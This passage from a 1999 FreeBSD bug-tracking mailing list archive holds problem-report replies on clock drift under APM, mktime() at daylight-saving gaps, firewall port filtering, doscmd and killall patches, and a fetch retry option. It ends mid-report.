kern/12022: System clock timewarps Reply-To: abc@firehouse.net Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR kern/12022; it has been noted by GNATS. From: abc@firehouse.net To: FreeBSD-gnats-submit@freebsd.org Cc: Subject: Re: kern/12022: System clock timewarps Date: Thu, 16 Dec 1999 22:41:16 -0500 (EST) >Submitter-Id: current-users >Originator: Alan Clegg >Organization: Firehouse Network Consulting >Confidential: no >Synopsis: Clock warp semi-fix >Severity: serious >Priority: high >Category: i386 >Release: FreeBSD 3.4-RC i386 >Class: sw-bug >Environment: Winbook XL2 500Mhz Celeron laptop >Description: Timewarp of over 6 seconds per minute (losing 6 seconds) >How-To-Repeat: enable kernel APM, watch clock skew so badly that nothing can bring it back. >Fix: Since I don't have the option of turning off APM (no BIOS options), and I really like being able to watch the status of my batteries, I need both clock _AND_ apm. I enable use of TSC even if there is APM. While this may act funky on certain systems, it sure did fix the problem here. Might we add another OPTION to allow use of tsc even if there is APM for those systems where it actually works? Change of (around 824 of /sys/i386/isa/clock.c): --------------- if (apm_version != APMINI_CANTFIND) +#if defined(APM_TSC_OK) + printf("APM BIOS found but using tsc anyway\n"); +else return; +#endif /* !defined(APM_TSC_OK) */ #endif /* NAPM > 0 */ --------------- with the addition of: options APM_TSC_OK to my config file allows me to override code to override broken BIOS. 8-) AlanC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 0: 0: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4617815008 for ; Fri, 17 Dec 1999 00:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA09093; Fri, 17 Dec 1999 00:00:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 00:00:03 -0800 (PST) Message-Id: <199912170800.AAA09093@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Andre Albsmeier Subject: Re: bin/15520: mktime() fails under certain conditions Reply-To: Andre Albsmeier Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15520; it has been noted by GNATS. From: Andre Albsmeier To: Poul-Henning Kamp Cc: Andre Albsmeier , FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15520: mktime() fails under certain conditions Date: Fri, 17 Dec 1999 08:57:38 +0100 On Thu, 16-Dec-1999 at 21:52:17 +0100, Poul-Henning Kamp wrote: > In message <19991216213647.A34480@internal>, Andre Albsmeier writes: > >On Thu, 16-Dec-1999 at 21:24:41 +0100, Poul-Henning Kamp wrote: > >> In message <199912162016.VAA97593@internal>, Andre Albsmeier writes: > >> > >> There is no 02:00:00 that night. If they test for that, they're > >> crazy. > > > >Yes, the time does not exist. However, I only wonder it our > >behaviour of returning an error is correct in this case. I don't > >trust the GNU/Linux guys as much as I trust FreeBSD :-) but there > >might be a reason they are testing it. > > > >I was already asked in private email if the mktime() should > >succeed according to POSIX.1... Does somebody know anything > >about that? > > Well, Hum. It seems to say that the fields are not constrained > to their normal domains: > > The original values of the tm_wday and tm_yday components > of the structure are ignored, and the original values of > the other components are not restricted to the ranges > described in the entry. > > It does not describe what should happen if I ask it to make a time > out of 25:100:100, but I guess most of us can agree what it should > do. > > The trouble with passing it 02:00:00 or for that matter 02:59:00 > on the "spring forward" night, is that the time doesn't exist in > the first place: Ie, does 02:10:00 represent > > 01:59:59 + 10:59 = 03:10:00 > or > 03:00:00 - 50:00 = 01:10:00 > > Since no sane argument either way really holds water, I think > returning an error is correct. As I wrote initally, the problem arises when configure tries to determine if mktime() works. I have now looked what happens in this case: The program replaces mktime with its own call. For the record, here is the interesting part (mktime.c, around line 277): if (t == t1 && t != t2 && (isdst < 0 || tm.tm_isdst < 0 || (isdst != 0) != (tm.tm_isdst != 0))) /* We can't possibly find a match, as we are oscillating between two values. The requested time probably falls within a spring-forward gap of size DT. Follow the common practice in this case, which is to return a time that is DT away from the requested time, preferring a time whose tm_isdst differs from the requested value. In practice, this is more useful than returning -1. */ break; else if (--remaining_probes == 0) return -1; -Andre To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 1:10: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C1BA115081 for ; Fri, 17 Dec 1999 01:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA15004; Fri, 17 Dec 1999 01:10:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 01:10:03 -0800 (PST) Message-Id: <199912170910.BAA15004@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Ruslan Ermilov Subject: Re: misc/15515: Firewall/FIltering Problems Reply-To: Ruslan Ermilov Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR misc/15515; it has been noted by GNATS. From: Ruslan Ermilov To: matheny@cs.purdue.edu Cc: freebsd-gnats-submit@FreeBSD.ORG Subject: Re: misc/15515: Firewall/FIltering Problems Date: Fri, 17 Dec 1999 11:04:26 +0200 On Thu, Dec 16, 1999 at 06:41:11AM -0800, matheny@cs.purdue.edu wrote: > > On a freebsd 3.3 firewall the ipfw rule is set to open. However, > ports 137-139 appear as filtered when a portscan is done. > What do you mean by "appear as filtered"? > We have checked with the DSL provider and the DSL modem manufacturer > to see if the modem has filtering capabilities or the service provider > filters and the answer to these questions was no. > Question: Why would the ports come back with filtered if were not > using a tcp wrapper and the firewall type is open? > Either you're using non-stock version of /etc/rc.firewall, or nothing is listening on 137-139. What do the following commands output: # ipfw show # netstat -an -finet | awk '$4 ~ "13[7-9]$" {print $0}' Cheers, -- Ruslan Ermilov Sysadmin and DBA of the ru@ucb.crimea.ua United Commercial Bank, ru@FreeBSD.org FreeBSD committer, +380.652.247.647 Simferopol, Ukraine http://www.FreeBSD.org The Power To Serve http://www.oracle.com Enabling The Information Age To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 1:47:40 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id D940014EB1; Fri, 17 Dec 1999 01:47:38 -0800 (PST) (envelope-from nbm@FreeBSD.org) Received: (from nbm@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA17727; Fri, 17 Dec 1999 01:47:38 -0800 (PST) (envelope-from nbm@FreeBSD.org) Date: Fri, 17 Dec 1999 01:47:38 -0800 (PST) From: Message-Id: <199912170947.BAA17727@freefall.freebsd.org> To: asami@FreeBSD.ORG, nbm@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: gnu/3810: cvs can't handle multiple multiple-path directories correctly Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: cvs can't handle multiple multiple-path directories correctly State-Changed-From-To: open->feedback State-Changed-By: nbm State-Changed-When: Fri Dec 17 01:34:41 PST 1999 State-Changed-Why: I don't get this, at least on a 2-week -CURRENT. Is this still a problem? (at least two cvs version imports since problem report) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 1:48:33 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 16C0815015; Fri, 17 Dec 1999 01:48:32 -0800 (PST) (envelope-from nbm@FreeBSD.org) Received: (from nbm@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA17861; Fri, 17 Dec 1999 01:48:31 -0800 (PST) (envelope-from nbm@FreeBSD.org) Date: Fri, 17 Dec 1999 01:48:31 -0800 (PST) From: Message-Id: <199912170948.BAA17861@freefall.freebsd.org> To: mi@aldan.algebra.com, nbm@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/4172: suggest reconnection option added to fetch Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: suggest reconnection option added to fetch State-Changed-From-To: suspended->feedback State-Changed-By: nbm State-Changed-When: Fri Dec 17 01:47:59 PST 1999 State-Changed-Why: Isn't this the behaviour of 'fetch -a'? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 1:52:30 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C5B7F1502B; Fri, 17 Dec 1999 01:52:28 -0800 (PST) (envelope-from nbm@FreeBSD.org) Received: (from nbm@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id BAA18139; Fri, 17 Dec 1999 01:52:28 -0800 (PST) (envelope-from nbm@FreeBSD.org) Date: Fri, 17 Dec 1999 01:52:28 -0800 (PST) From: Message-Id: <199912170952.BAA18139@freefall.freebsd.org> To: sramkris@ichips.intel.com, nbm@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: kern/3569: ex0 driver doesn't work with EtherExpress Pro/10 Board Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: ex0 driver doesn't work with EtherExpress Pro/10 Board State-Changed-From-To: open->feedback State-Changed-By: nbm State-Changed-When: Fri Dec 17 01:51:57 PST 1999 State-Changed-Why: Is this still an issue? There have been numerous changes to the driver since 2.2.1. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 2:40: 4 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 5511514C87 for ; Fri, 17 Dec 1999 02:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id CAA21373; Fri, 17 Dec 1999 02:40:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 02:40:03 -0800 (PST) Message-Id: <199912171040.CAA21373@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Sheldon Hearn Subject: Re: bin/15496: killall(1) limited to 16 character process names by procfs(5) Reply-To: Sheldon Hearn Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15496; it has been noted by GNATS. From: Sheldon Hearn To: m.seaman@inpharmatica.co.uk Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15496: killall(1) limited to 16 character process names by procfs(5) Date: Fri, 17 Dec 1999 12:38:53 +0200 On Wed, 15 Dec 1999 15:48:18 GMT, m.seaman@inpharmatica.co.uk wrote: > killall(1) reads procfs /proc/${pid}/status entries to find > the process names the user wants to kill. Can we get the process names anywhere else? Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 3: 0: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 85F0615091 for ; Fri, 17 Dec 1999 03:00:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA23127; Fri, 17 Dec 1999 03:00:04 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 667D314DB6; Fri, 17 Dec 1999 02:57:28 -0800 (PST) Message-Id: <19991217105728.667D314DB6@hub.freebsd.org> Date: Fri, 17 Dec 1999 02:57:28 -0800 (PST) From: sakauchi@yamame.to To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15528: doscmd exec function fail. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15528 >Category: i386 >Synopsis: doscmd exec function fail. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 03:00:03 PST 1999 >Closed-Date: >Last-Modified: >Originator: Atushi Sakauchi >Release: FreeBSD 3.3-Release >Organization: >Environment: FreeBSD 3.3-Release >Description: DOS function 4c (exit with return code) is fail allways. program that call "child process" will fail. >How-To-Repeat: % doscmd cl ( cl.exe launch c1.exe ) >Fix: --- dos.c.save Mon Aug 30 00:26:58 1999 +++ dos.c Fri Dec 17 19:21:54 1999 @@ -1704,6 +1704,7 @@ { return_status = R_AL; done(REGS, R_AL); + return(0); } /* >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 3:21:41 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 9ACFC15069; Fri, 17 Dec 1999 03:21:40 -0800 (PST) (envelope-from deischen@FreeBSD.org) Received: (from deischen@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA29954; Fri, 17 Dec 1999 03:21:40 -0800 (PST) (envelope-from deischen@FreeBSD.org) Date: Fri, 17 Dec 1999 03:21:40 -0800 (PST) From: Message-Id: <199912171121.DAA29954@freefall.freebsd.org> To: ag@muc.de, deischen@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: i386/14383: pthread_kill() does not call sighandler of specific thread Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pthread_kill() does not call sighandler of specific thread State-Changed-From-To: open->closed State-Changed-By: deischen State-Changed-When: Fri Dec 17 03:21:07 PST 1999 State-Changed-Why: Fixed in -current. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 3:55:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id E257E151AF; Fri, 17 Dec 1999 03:55:19 -0800 (PST) (envelope-from deischen@FreeBSD.org) Received: (from deischen@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id DAA32754; Fri, 17 Dec 1999 03:55:19 -0800 (PST) (envelope-from deischen@FreeBSD.org) Date: Fri, 17 Dec 1999 03:55:19 -0800 (PST) From: Message-Id: <199912171155.DAA32754@freefall.freebsd.org> To: bryant@cs.usm.maine.edu, deischen@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/10992: pthread_kill() doesn't deliver signals to threads in blocking syscall Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: pthread_kill() doesn't deliver signals to threads in blocking syscall State-Changed-From-To: open->analyzed State-Changed-By: deischen State-Changed-When: Fri Dec 17 03:54:23 PST 1999 State-Changed-Why: This should be fixed in -current. I'll wait a week or so, then close out the PR if I don't get any feedback. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 5:17:16 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id 7272314F2D; Fri, 17 Dec 1999 05:17:14 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id IAA79674; Fri, 17 Dec 1999 08:17:13 -0500 (EST) From: Mikhail Teterin X-Relay-IP: 10.10.0.1 Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id IAA60345; Fri, 17 Dec 1999 08:17:13 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912171317.IAA60345@rtfm.newton> Subject: Re: bin/4172: suggest reconnection option added to fetch In-Reply-To: <199912170948.BAA17861@freefall.freebsd.org> from "nbm@FreeBSD.org" at "Dec 17, 1999 01:48:31 am" To: nbm@FreeBSD.org Date: Fri, 17 Dec 1999 08:17:13 -0500 (EST) Cc: freebsd-bugs@FreeBSD.org X-Face: %UW#n0|w>ydeGt/b@1-.UFP=K^~-:0f#O:D7w hJ5G_<5143Bb3kOIs9XpX+"V+~$adGP:J|SLieM31VIhqXeLBli"feedback =State-Changed-By: nbm =State-Changed-When: Fri Dec 17 01:47:59 PST 1999 =State-Changed-Why: =Isn't this the behaviour of 'fetch -a'? No, ``-a'' is for "soft failures". It will not retry if the server died in the middle of the process... -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 5:23:20 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from ns1.sunesi.net (ns1.sunesi.net [196.15.192.194]) by hub.freebsd.org (Postfix) with ESMTP id BC26B15076 for ; Fri, 17 Dec 1999 05:23:12 -0800 (PST) (envelope-from nbm@sunesi.net) Received: from nbm by ns1.sunesi.net with local (Exim 3.03 #1) id 11yxLR-0005j3-00; Fri, 17 Dec 1999 15:22:53 +0200 Date: Fri, 17 Dec 1999 15:22:53 +0200 From: Neil Blakey-Milner To: Mikhail Teterin Cc: freebsd-bugs@FreeBSD.org Subject: Re: bin/4172: suggest reconnection option added to fetch Message-ID: <19991217152252.A21917@mithrandr.moria.org> References: <199912170948.BAA17861@freefall.freebsd.org> <199912171317.IAA60345@rtfm.newton> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0pre2i In-Reply-To: <199912171317.IAA60345@rtfm.newton> Organization: Rhodes University Computer Users' Society X-Operating-System: FreeBSD 3.3-RELEASE i386 X-URL: http://rucus.ru.ac.za/~nbm/ Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri 1999-12-17 (08:17), Mikhail Teterin wrote: > No, ``-a'' is for "soft failures". It will not retry if the server > died in the middle of the process... So you want fetch to continue trying through several hard failures that may indicate network disconnection, servers dying, nuclear war, and other nasty things? A 'hard failure' is _supposed_ to be a show-stopper, surely? Neil -- Neil Blakey-Milner nbm@rucus.ru.ac.za To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 5:41:57 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from kot.ne.mediaone.net (kot.ne.mediaone.net [24.218.15.190]) by hub.freebsd.org (Postfix) with ESMTP id 78C9614E98 for ; Fri, 17 Dec 1999 05:41:55 -0800 (PST) (envelope-from mi@kot.ne.mediaone.net) Received: from rtfm.newton (rtfm.newton [10.10.0.1]) by kot.ne.mediaone.net (8.9.3/8.9.1) with ESMTP id IAA79744; Fri, 17 Dec 1999 08:41:54 -0500 (EST) From: Mikhail Teterin X-Relay-IP: 10.10.0.1 Received: (from mi@localhost) by rtfm.newton (8.9.3/8.9.3) id IAA92204; Fri, 17 Dec 1999 08:41:54 -0500 (EST) (envelope-from mi@kot.ne.mediaone.net) Message-Id: <199912171341.IAA92204@rtfm.newton> Subject: Re: bin/4172: suggest reconnection option added to fetch In-Reply-To: <19991217152252.A21917@mithrandr.moria.org> from Neil Blakey-Milner at "Dec 17, 1999 03:22:53 pm" To: Neil Blakey-Milner Date: Fri, 17 Dec 1999 08:41:53 -0500 (EST) Cc: freebsd-bugs@FreeBSD.org X-Face: %UW#n0|w>ydeGt/b@1-.UFP=K^~-:0f#O:D7w hJ5G_<5143Bb3kOIs9XpX+"V+~$adGP:J|SLieM31VIhqXeLBli" No, ``-a'' is for "soft failures". It will not retry if the server => died in the middle of the process... = =So you want fetch to continue trying through several hard failures that =may indicate network disconnection, servers dying, nuclear war, and =other nasty things? I want there to be an option to request it to keep trying. Kind of like cvsup does. =A 'hard failure' is _supposed_ to be a show-stopper, surely? Not if the user explicitly requested it not to be :) -mi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 7:30: 6 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4112814C3B for ; Fri, 17 Dec 1999 07:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id HAA56014; Fri, 17 Dec 1999 07:30:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Date: Fri, 17 Dec 1999 07:30:02 -0800 (PST) Message-Id: <199912171530.HAA56014@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org Cc: From: Matthew Seaman Subject: Re: bin/15496: killall(1) limited to 16 character process names by procfs(5) Reply-To: Matthew Seaman Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org The following reply was made to PR bin/15496; it has been noted by GNATS. From: Matthew Seaman To: Sheldon Hearn Cc: FreeBSD-gnats-submit@FreeBSD.ORG Subject: Re: bin/15496: killall(1) limited to 16 character process names by procfs(5) Date: Fri, 17 Dec 1999 15:29:31 +0000 Sheldon Hearn wrote: > > On Wed, 15 Dec 1999 15:48:18 GMT, m.seaman@inpharmatica.co.uk wrote: > > > killall(1) reads procfs /proc/${pid}/status entries to find > > the process names the user wants to kill. > > Can we get the process names anywhere else? Hmmm... The only other prospect in /proc is the 'cmdline' entry, but that has the same 16 character limitation as the status entry. st-pancras:/tmp:% ./12345678901234567 & [1] 79007 st-pancras:/tmp:% cd /proc/79007 st-pancras:/proc/79007:% cat cmdline 1234567890123456st-pancras:/proc/79007:% Failing that, we could parse the output of /bin/ps -ax --- easily doable from perl, but dependent on processes not mangling argv[0] in unforeseen ways (ps -axc has the same 16 character limitation as above). Otherwise, we'd be looking at reading kvm the way ps(1) does, which is not much fun from perl: it would probably be necessary to implement a FreeBSD::KVM module using the perl '.xs' code thingy to generate an interface to the kvm functions. Plus we would have to use suidperl to run the script setgid to kmem, which doesn't strike me as particularly desirable. Hmmm... here's a patch to killall(1) to use ps(1) output as well as reading /proc: ps(1) output is used if the given program-name-to-kill is longer than 16 characters, or a match could not otherwise be made, to distinguish between similarly named processes around 16 characters long. eg: st-pancras:~:% /tmp/1234567890123456 & [1] 79288 st-pancras:~:% /tmp/12345678901234567 & [2] 79289 st-pancras:~:% ./killall.pl -v 12345678901234567 kill -TERM 79289 [2] - Terminated /tmp/12345678901234567 st-pancras:~:% ./killall.pl -v 1234567890123456 kill -TERM 79288 [1] + Terminated /tmp/1234567890123456 diff -u killall.pl.orig killall.pl --- killall.pl.orig Tue Aug 31 10:08:27 1999 +++ killall.pl Fri Dec 17 15:19:39 1999 @@ -30,11 +30,13 @@ $ENV{'PATH'} = '/bin:/usr/bin'; # security +$pscmd = '/bin/ps -ax'; # list all processes $procfs = '/proc'; $signal = 'SIGTERM'; # default signal for kill $debug = 0; $match = 0; # 0 match exactly program name $show = 0; # do nothings +%procs = (); # Lookup processes by PID # see /sys/miscfs/procfs/procfs_status.c $PROC_NAME = 0; @@ -68,6 +70,23 @@ undef %pidu; undef %thiskill; +open(PS, "$pscmd|") || die "$pscmd $!\n"; +while () { + my ($pid, $proc); + chomp; + + # Processes can alter their argv[0], which will be reflected in + # ps(1) output, so this is by no means reliable. Typically login + # shells will have `-' pre-pended. System processes like swapper + # are usually in (brackets) and then there's sendmail and nfsd that + # use argv[0] for status messages. + + if (($pid, $proc) = m/^\s*(\d+)\s+\S+\s+\S+\s+\S+\s+(\S+)/) { + ($procs{$pid} = $proc) =~ s@.*/@@; # Strip any leading path + } +} +close(PS); + foreach (sort{$a <=> $b} grep(/^[0-9]/, readdir(PROCFS))) { $status = "$procfs/$_/status"; $pid = $_; @@ -85,8 +104,12 @@ ($programMatch = $program) =~ s/(\W)/\\$1/g if $match; # match program name - if ($proc[$PROC_NAME] eq $program || - ($match && $proc[$PROC_NAME] =~ /$programMatch/i)) { + if ( (length $program <= 16 && + ($proc[$PROC_NAME] eq $program || + ($match && $proc[$PROC_NAME] =~ /$programMatch/i))) || + (defined $procs{$pid} && + ($procs{$pid} eq $program || + ($match && $procs{$pid} =~ /$programMatch/i)))) { # id test if ($proc[$PROC_EUID] eq $id || # effective uid -- Certe, Toto, sentio nos in Kansate non iam adesse. Dr. Matthew Seaman, Inpharmatica Ltd, 60 Charlotte St, London, W1P 2AX Tel: +44 171 631 4644 x229 Fax: +44 171 631 4844 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 11:10: 5 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 6406B1577A for ; Fri, 17 Dec 1999 11:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA75898; Fri, 17 Dec 1999 11:10:02 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id 1B48A15771; Fri, 17 Dec 1999 10:59:56 -0800 (PST) Message-Id: <19991217185956.1B48A15771@hub.freebsd.org> Date: Fri, 17 Dec 1999 10:59:56 -0800 (PST) From: sakauchi@yamame.to To: freebsd-gnats-submit@freebsd.org X-Send-Pr-Version: www-1.0 Subject: i386/15531: doscmd DOS function 0a fail when DL is 0 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15531 >Category: i386 >Synopsis: doscmd DOS function 0a fail when DL is 0 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 11:10:00 PST 1999 >Closed-Date: >Last-Modified: >Originator: Atushi Sakauchi >Release: FreeBSD 3.3-Release >Organization: >Environment: FreeBSD 3.3-Release >Description: doscmd DOS function 0a( bufferd keyboard input ) will immediate return when DL is 0. >How-To-Repeat: call function 0a with dx=0x100 >Fix: --- dos.c.save Mon Aug 30 00:26:58 1999 +++ dos.c Sat Dec 18 03:46:51 1999 @@ -568,7 +568,7 @@ int n; /* pointer to buffer */ - addr = (unsigned char *)N_GETPTR(R_DS, R_DL); + addr = (unsigned char *)N_GETPTR(R_DS, R_DX); /* capacity of buffer */ avail = addr[0]; >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Fri Dec 17 11:50: 7 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id C10E31577E for ; Fri, 17 Dec 1999 11:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id LAA80000; Fri, 17 Dec 1999 11:50:03 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: from blaubaer.kn-bremen.de (blaubaer.kn-bremen.de [195.37.179.254]) by hub.freebsd.org (Postfix) with ESMTP id 77C5A14DD0 for ; Fri, 17 Dec 1999 11:46:04 -0800 (PST) (envelope-from nox@saturn.kn-bremen.de) Received: from saturn.kn-bremen.de (uucp@localhost) by blaubaer.kn-bremen.de (8.9.1/8.9.1) with UUCP id UAA01904 for FreeBSD-gnats-submit@freebsd.org; Fri, 17 Dec 1999 20:43:08 +0100 Received: (from nox@localhost) by saturn.kn-bremen.de (8.9.3/8.8.5) id UAA25488; Fri, 17 Dec 1999 20:27:46 +0100 (CET) Message-Id: <199912171927.UAA25488@saturn.kn-bremen.de> Date: Fri, 17 Dec 1999 20:27:46 +0100 (CET) From: Juergen Lock Reply-To: nox@jelal.kn-bremen.de To: FreeBSD-gnats-submit@freebsd.org X-Send-Pr-Version: 3.2 Subject: kern/15532: Reboot just to kill a print job? Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 15532 >Category: kern >Synopsis: Reboot just to kill a print job? >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: change-request >Submitter-Id: current-users >Arrival-Date: Fri Dec 17 11:50:02 PST 1999 >Closed-Date: >Last-Modified: >Originator: Juergen Lock >Release: FreeBSD 3.3-STABLE i386 >Organization: me? organized? >Environment: 3.3-STABLE i386 and an (old) parallel printer >Description: I just lpr'd a page and then heared strange sounds from the printer: paper jam... Now i cannot remember 